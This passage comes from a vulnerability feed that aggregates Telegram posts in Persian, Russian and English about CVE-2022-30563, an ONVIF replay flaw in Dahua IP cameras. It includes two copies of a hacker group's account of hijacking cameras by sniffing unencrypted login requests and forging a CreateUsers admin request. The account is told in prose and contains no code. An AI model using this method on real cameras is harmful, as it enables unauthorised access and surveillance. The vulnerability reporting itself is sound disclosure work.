\u0645\u0634\u0627\u0647\u062f\u0647 \u0641\u06cc\u0644\u0645 \u062f\u0648\u0631\u0628\u06cc\u0646\u060c \u0642\u0641\u0644 \u06cc\u0627 \u0628\u0627\u0632 \u06a9\u0631\u062f\u0646 \u0642\u0641\u0644 \u062f\u0631\u0628 \u0647\u0648\u0634\u0645\u0646\u062f\u060c \u0648 \u0627\u0646\u062c\u0627\u0645 \u0639\u0645\u0644\u06cc\u0627\u062a \u062a\u0639\u0645\u06cc\u0631 \u0648 \u0646\u06af\u0647\u062f\u0627\u0631\u06cc.\n\n\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u0648\u0633\u0637 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0628\u0631\u0627\u06cc \u0628\u0647 \u062e\u0637\u0631 \u0627\u0646\u062f\u0627\u062e\u062a\u0646 \u062f\u0648\u0631\u0628\u06cc\u0646\u200c\u0647\u0627\u06cc \u0634\u0628\u06a9\u0647 \u0628\u0627 \u0631\u0647\u06af\u06cc\u0631\u06cc \u06cc\u06a9 \u0627\u0631\u062a\u0628\u0627\u0637 ONVIF \u0631\u0645\u0632\u06af\u0630\u0627\u0631\u06cc\u200c\u0646\u0634\u062f\u0647 \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u062c\u062f\u062f \u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u062f\u0631 \u06cc\u06a9 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u062c\u062f\u06cc\u062f \u0628\u0647 \u062f\u0648\u0631\u0628\u06cc\u0646 \u0645\u0648\u0631\u062f \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u062f\u060c \u06a9\u0647 \u062a\u0648\u0633\u0637 \u062f\u0633\u062a\u06af\u0627\u0647 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0639\u062a\u0628\u0631 \u067e\u0630\u06cc\u0631\u0641\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f.\n\n\u0645\u0647\u0627\u062c\u0645\u0627\u0646\u060c \u0628\u0647 \u0648\u06cc\u0698\u0647 APT\u0647\u0627\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0639\u0644\u0627\u0642\u0647 \u0645\u0646\u062f \u0628\u0647 \u0647\u06a9 \u06a9\u0631\u062f\u0646 \u062f\u0648\u0631\u0628\u06cc\u0646 \u0647\u0627\u06cc IP \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u0628\u062e\u0634\u06cc \u0627\u0632 \u06a9\u0645\u067e\u06cc\u0646 \u0647\u0627\u06cc \u062c\u0627\u0633\u0648\u0633\u06cc \u0628\u0631 \u0631\u0648\u06cc \u062a\u062c\u0647\u06cc\u0632\u0627\u062a \u06cc\u0627 \u0641\u0631\u0622\u06cc\u0646\u062f\u0647\u0627\u06cc \u062a\u0648\u0644\u06cc\u062f \u0647\u062f\u0641 \u0628\u0627\u0634\u0646\u062f. \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0631\u0627\u0647 \u062d\u0644\u06cc \u0628\u0631\u0627\u06cc \u0648\u0638\u0627\u06cc\u0641 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647 \u0642\u0628\u0644 \u0627\u0632 \u0634\u0631\u0648\u0639 \u06cc\u06a9 \u062d\u0645\u0644\u0647 \u0633\u0627\u06cc\u0628\u0631\u06cc \u0627\u0631\u0627\u0626\u0647 \u062f\u0647\u062f.\n\n\u067e\u0633 \u0627\u0632 \u0628\u0647 \u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u0627\u0639\u062a\u0628\u0627\u0631\u060c \u0645\u0647\u0627\u062c\u0645 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u06cc\u06a9 \u062d\u0633\u0627\u0628 \u0645\u062f\u06cc\u0631 \u0627\u0636\u0627\u0641\u0647 \u06a9\u0646\u062f \u0648 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0645\u0644 \u0628\u0647 \u062f\u0633\u062a\u06af\u0627\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f.\n\n\u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0632\u06cc\u0631 \u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0648\u06cc\u062f\u06cc\u0648\u06cc\u06cc \u062f\u0627\u0647\u0648\u0627 \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647\u200c\u0627\u0646\u062f: \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc Dahua ASI7XXX \u0642\u0628\u0644 \u0627\u0632 v1.000.0000009.0.R.220620\u061b \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u062f\u0627\u0647\u0648\u0627 IPC-HDBW2XXX \u0642\u0628\u0644 \u0627\u0632 v2.820.0000000.48.R.220614\u061b \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u062f\u0627\u0647\u0648\u0627 IPC-HX2XXX \u0642\u0628\u0644 \u0627\u0632 v2.820.0000000.48.R.220614.\n\n\u0633\u0627\u0632\u0646\u062f\u0647 \u0628\u0627 \u0627\u0646\u062a\u0634\u0627\u0631 \u06cc\u06a9 \u067e\u0686 \u0645\u0634\u06a9\u0644 \u0631\u0627 \u0628\u0631\u0637\u0631\u0641 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a.\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f \u0628\u0627\u0632\u0646\u0634\u0631 \u0645\u0637\u0627\u0644\u0628 \u0627\u06cc\u0646 \u06a9\u0627\u0646\u0627\u0644 \u0635\u0631\u0641\u0627 \u0628\u0627 \u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u06a9\u0627\u0645\u0644 \u06a9\u0627\u0646\u0627\u0644 \u0645\u062c\u0627\u0632 \u0645\u06cc\u0628\u0627\u0634\u062f.\n\n\ud83c\udfed\u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\n\u0627\u062f\u0645\u06cc\u0646:\nhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert\n\u062a\u0648\u06cc\u06cc\u062a\u0631:\nhttps://twitter.com/icscerti", "creation_timestamp": "2022-08-05T11:33:04.000000Z"}, {"uuid": "027183b0-f5b9-4f75-88ef-7382dc79166b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "published-proof-of-concept", "source": "https://t.me/cKure/10024", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 A vulnerability, tracked as CVE-2022-30563, impacting Dahua IP Camera can allow attackers to seize control of IP cameras \ud83d\udcf7 \n\nhttps://securityaffairs.co/wordpress/133877/hacking/dahua-severe-flaw.html", "creation_timestamp": "2022-08-01T07:38:24.000000Z"}, {"uuid": "eb3be170-ec3f-49fe-9539-7112605bc82f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "published-proof-of-concept", "source": "https://t.me/tengkorakcybercrewz/4600", "content": "Hackers Arise IoT Hacking: How We Hacked the Dahua Cameras In Ukraine and Russia \nWelcome back, my aspiring cyberwarriors!\n\n\n\n\nAs you know, Hackers-Arise played a key role in the Ukrainian resistance  to Russia&apos;s brutal attack. We did many things to support Ukraine including attacking Russia&apos;s industrial infrastructure, DoS&apos;ed the corporate and government websites, and trained hackers to protect Ukraine. What we may be most famous for is the hacking of IP cameras throughout Ukraine at the request of the Ukraine army to surveil Russian movements and war crimes in the country.\n\n\n\n\n\n\n\n\n\n\nHere is a small sampling of some of the pictures we captured.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nAt the time, we did not reveal our techniques (for obvious reasons) but that two years have passed and the vulnerability patched, we are ready to reveal to the world how we hacked so many cameras in both Ukraine and Russia!\n\n\n\n\nAs we revealed in earlier tutorials, we used default credentials for many of the cameras and brute forced the credentials for many others. This harvested about 15-20% of the cameras we targeted.  It&apos;s always important to try to get the \"low-hanging fruit\" first.The remaining 80% we were able to use two exploits, one that was a zero-day against Dahua cameras. \n\n\n\n\nLet&apos;s focus on that one.\n\n\n\n\nDahua Zero-Day\n\n\n\n\nDahua is a China-based IP camera manufacturer that is among the world&apos;s largest. Besides making cameras with their own name, they also private label cameras for many other re-sellers. Their cameras are literally all over the world!\n\n\n\n\nOn June 28, 2022, the good people at NIST announced a new vulnerability in the Dahua cameras and assigned it CVE-2022-30563 and gave it a base score of 7.8. They described the vulnerability as:\n\n\n\n\nWhen an attacker uses a man-in-the-middle attack to sniff the request packets with success logging in through ONVIF, he can log in to the device by replaying the user&apos;s login packet.\n\n\n\n\nan article on SecurityAffairs.com described the vulnerability in a headline that read:\n\n\n\n\n\"A flaw in Dahua IP Cameras allows full take over of the devices\"\n\n\n\n\nThis was several months after we had been successfully exploiting this flaw in cameras in both Ukraine and Russia.\n\n\n\n\nWhat is ONVIF?\n\n\n\n\nONVIF is the Open Network Video Interface Forum. This is an open standard that is used in IP-based physical security products. ONVIF products allow access through a set of standardized API&apos;s. These API&apos;s allow the user to watch the video from the camera, unlock smart doors, and add users and passwords. ONVIF requests are transmitted through XML SOAP messages.\n\n\n\n\nThe ONVIF accepts, among other authentication mechanisms, WS-UsernameToken such as seen below.\n\n\n\n\nNote that the WS-UsernameToken accepts:\n\n\n\n\n1. \na username\n\n2. \na nonce\n\n3. \nCreated\n\n4. \npassword\n\n\n\n\n\nWS-UsernameToken then generates a Base64 digest. This helps to obscure this data, most importantly, the password from being intercepted an used in a MiTM attack. By incorporating the timestamp, it also prevents replay attacks.\n\n\n\n\n\n\n\n\n\n\nTo be successful, the attacker must first sniff a single unencrypted ONVIF request such as shown above. This is relatively easy as WS-UsernameToken is used by default on these devices and they use HTTP rather than HTTPS, so the transmission is unencrypted.\n\n\n\n\nNext, the attacker then forges a new CreateUsers request that adds a new user with admin privileges!\n\n\n\n\n\n\n\n\n\n\nOnce the new admin account has been created, the attacker can then simply login into the new account and take control of the device. This includes zoom, tilt and pan (if enabled) and deleting other accounts including other admin accounts.\n\n\n\n\n\n\n\n\n\n\n\n\n\nSummary\n\n\n\n\nInternet of Things devices are everywhere and in most cases their security[...]", "creation_timestamp": "2024-09-25T22:32:27.000000Z"}, {"uuid": "f4135ed3-8d6a-45ca-aa33-b812804c8cda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "seen", "source": "https://t.me/true_secator/3236", "content": "Nozomi Networks \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,4 \u0432 IP-\u043a\u0430\u043c\u0435\u0440\u0430\u0445 Dahua, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430.\n\nCVE-2022-30563 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 WS-UsernameToken Open Network Video Interface Forum (ONVIF) \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 IP-\u043a\u0430\u043c\u0435\u0440\u0430\u0445 Dahua.\n\n\u041f\u0440\u043e\u0434\u0443\u043a\u0442\u044b, \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u044b\u0435 \u0441 ONVIF, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043d\u0430\u0431\u043e\u0440\u0430 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u043e\u0432 \u043f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f (API), \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0432\u0438\u0434\u0435\u043e\u0437\u0430\u043f\u0438\u0441\u0438 \u0441 \u043a\u0430\u043c\u0435\u0440\u044b, \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0443 \u0438\u043b\u0438 \u0440\u0430\u0437\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0443 \u0443\u043c\u043d\u043e\u0439 \u0434\u0432\u0435\u0440\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u043f\u043e \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u044e.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0434\u043b\u044f \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u043a\u0430\u043c\u0435\u0440 \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u043d\u0435\u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f ONVIF \u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u043d\u043e\u0432\u043e\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u043a \u043a\u0430\u043c\u0435\u0440\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u0443\u0434\u0443\u0442 \u043f\u0440\u0438\u043d\u044f\u0442\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e\u043c \u043a\u0430\u043a \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u0432 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438 \u0410\u0420\u0422, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d\u044b \u0432\u043e \u0432\u0437\u043b\u043e\u043c\u0435 IP-\u043a\u0430\u043c\u0435\u0440 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u043b\u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0446\u0435\u043b\u0438. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043c\u043e\u0436\u0435\u0442 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0442\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u0437\u0430\u0434\u0430\u0447 \u043f\u043e \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0435, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c\u043e\u0439 \u0434\u043e \u043d\u0430\u0447\u0430\u043b\u0430 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438.\n\n\u041f\u043e\u043b\u0443\u0447\u0438\u0432 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0443.\n\n\u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u00a0\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u0438\u0434\u0435\u043e\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Dahua: Dahua ASI7XXX \u0432\u0435\u0440\u0441\u0438\u0439 \u0434\u043e v1.000.0000009.0.R.220620; Dahua IPC-HDBW2XXX \u0432\u0435\u0440\u0441\u0438\u0439 \u0434\u043e v2.820.0000000.48.R.220614; Dahua IPC-HX2XXX \u0432\u0435\u0440\u0441\u0438\u0439 \u0434\u043e v2.820.0000000.48.R.220614.\n\n\u041f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443,\u00a0\u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432\u00a0\u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.", "creation_timestamp": "2022-08-01T11:27:54.000000Z"}, {"uuid": "5f012a06-b54e-409c-8bcb-9e1e4dca1431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "seen", "source": "https://t.me/cibsecurity/45306", "content": "\u203c CVE-2022-30563 \u203c\n\nWhen an attacker uses a man-in-the-middle attack to sniff the request packets with success logging in through ONVIF, he can log in to the device by replaying the user's login packet.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-28T18:36:08.000000Z"}, {"uuid": "99e82e59-b30b-4488-87d3-5b4787015887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "seen", "source": "https://t.me/thehackernews/2424", "content": "Researchers have discovered a new vulnerability (CVE-2022-30563) in Dahua IP cameras that can be exploited by remote attackers to compromise the cameras.\n\nRead details: https://thehackernews.com/2022/07/dahua-ip-camera-vulnerability-could-let.html", "creation_timestamp": "2022-09-28T22:11:31.000000Z"}, {"uuid": "428e409e-04f7-4f29-baac-c5d0bed74915", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "exploited", "source": "https://t.me/haccking/8303", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c IP-\u043a\u0430\u043c\u0435\u0440\u044b Dahua \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438\n\n\u0411\u044b\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u044b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 Dahua Open Network Video Interface Forum ( ONVIF ), \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0437\u0430\u0445\u0432\u0430\u0442\u0443 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u043d\u0430\u0434 IP-\u043a\u0430\u043c\u0435\u0440\u0430\u043c\u0438.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30563 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 7,4), \u00ab\u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u043a\u0430\u043c\u0435\u0440 \u043f\u0443\u0442\u0435\u043c \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u043d\u0435\u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f ONVIF \u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e\u0433\u043e \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u043d\u043e\u0432\u043e\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u043a \u043a\u0430\u043c\u0435\u0440\u0435\u00bb, \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0438 Nozomi Networks. \u043e\u0442\u0447\u0435\u0442 \u0432 \u0447\u0435\u0442\u0432\u0435\u0440\u0433.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u0430\u044f \u0432 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0438, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u043c 28 \u0438\u044e\u043d\u044f 2022 \u0433., \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b:\n\nDahua ASI7XXX: \u0412\u0435\u0440\u0441\u0438\u0438 \u0434\u043e v1.000.0000009.0.R.220620\n\nDahua IPC-HDBW2XXX: \u0412\u0435\u0440\u0441\u0438\u0438 \u0434\u043e v2.820.0000000.48.R.220614\n\nDahua IPC-HX2XXX: \u0412\u0435\u0440\u0441\u0438\u0438 \u0434\u043e v2.820.0000000.48.R.220614\n\nLife hack\ud83d\udc48", "creation_timestamp": "2022-07-29T19:24:54.000000Z"}, {"uuid": "c8bff0e0-9af4-4ed5-b423-fe6b7a17d8fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "published-proof-of-concept", "source": "https://t.me/tengkorakcybercrewz/21776", "content": "Hackers Arise IoT Hacking: How We Hacked the Dahua Cameras In Ukraine and Russia \nWelcome back, my aspiring cyberwarriors!\n\n\n\n\nAs you know, Hackers-Arise played a key role in the Ukrainian resistance  to Russia&apos;s brutal attack. We did many things to support Ukraine including attacking Russia&apos;s industrial infrastructure, DoS&apos;ed the corporate and government websites, and trained hackers to protect Ukraine. What we may be most famous for is the hacking of IP cameras throughout Ukraine at the request of the Ukraine army to surveil Russian movements and war crimes in the country.\n\n\n\n\n\n\n\n\n\n\nHere is a small sampling of some of the pictures we captured.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nAt the time, we did not reveal our techniques (for obvious reasons) but that two years have passed and the vulnerability patched, we are ready to reveal to the world how we hacked so many cameras in both Ukraine and Russia!\n\n\n\n\nAs we revealed in earlier tutorials, we used default credentials for many of the cameras and brute forced the credentials for many others. This harvested about 15-20% of the cameras we targeted.  It&apos;s always important to try to get the \"low-hanging fruit\" first.The remaining 80% we were able to use two exploits, one that was a zero-day against Dahua cameras. \n\n\n\n\nLet&apos;s focus on that 